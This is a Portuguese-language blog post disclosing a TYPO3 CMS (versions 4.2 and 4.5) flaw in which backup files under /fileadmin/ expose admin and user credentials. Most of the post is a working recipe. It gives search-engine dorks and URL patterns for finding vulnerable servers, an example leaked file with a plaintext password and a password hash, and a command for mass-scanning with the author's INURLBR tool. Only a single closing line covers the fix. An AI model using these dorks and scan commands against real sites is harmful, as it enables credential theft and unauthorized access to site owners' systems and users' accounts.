Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor.
No procedimento de criar dork, refazer e criar um novo padrão. acabei descobrindo uma falha no
CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma.
"Não é um CMS muito usado, o artigo é somente para estudos mesmo. Um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."
Os arquivos de senha são guardados na pasta "/fileadmin/" alguns com uma string fixa nome "utopia" e sua extensão é ".t3d.xml" ou .t3d
INFORMAÇÕES: # ---------------------------------------------------------- #[+] Type: Full Info Disclosure #[+] Vendor: https://typo3.org/typo3-cms/ #[+] VULNERABLE VERSIONS: 4.2, 4.5 # ---------------------------------------------------------- #[+] AUTOR: googleINURL #[+] EMAIL: [email protected] #[+] Blog: http://blog.inurl.com.br #[+] Twitter: https://twitter.com/googleinurl #[+] Fanpage: https://fb.com/InurlBrasil #[+] Pastebin http://pastebin.com/u/Googleinurl #[+] GIT: https://github.com/googleinurl #[+] PSS: http://packetstormsecurity.com/user/googleinurl #[+] YOUTUBE: http://youtube.com/c/INURLBrasil #[+] PLUS: http://google.com/+INURLBrasil #[+] IRC: irc.pŕiv8.jp / #inurlbrasilDORKS DE PESQUISA:
- /fileadmin/utopia ext:xml
- /fileadmin/utopia*.t3d.xml
- site:fr /fileadmin/utopia ext:xml
- "utopia" inurl:t3d ext:xml
- /fileadmin/ typo3 ext:t3d
http://{server}/fileadmin/utopia{random}.t3d.xml
http://{server}/subdir/fileadmin/utopia{random}.t3d.xml
Ex:
http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml
http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml
Exemplo Conteúdo arquivo:
POC ARQUIVO .T3D:
http://{server}/fileadmin/*.t3d
http://{server}/fileadmin/archives_site/*.t3d
http://{server}/subdir/fileadmin/*.t3d
Ex:
http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d
http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d
Exemplo Conteúdo arquivo:
s:11:"admin_xxxx";s:5:"email";s:26:"[email protected]";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"[email protected]";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1
Pesquisa em massa usando SCANNER INURLBR.
Download: https://github.com/googleinurl/SCANNER-INURLBR
Comando:
php inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a '<username>' Resultado: Solução ? Faça upgrade do CMS e Configure adequadamente as permissões de arquivos e pastas do se servidor.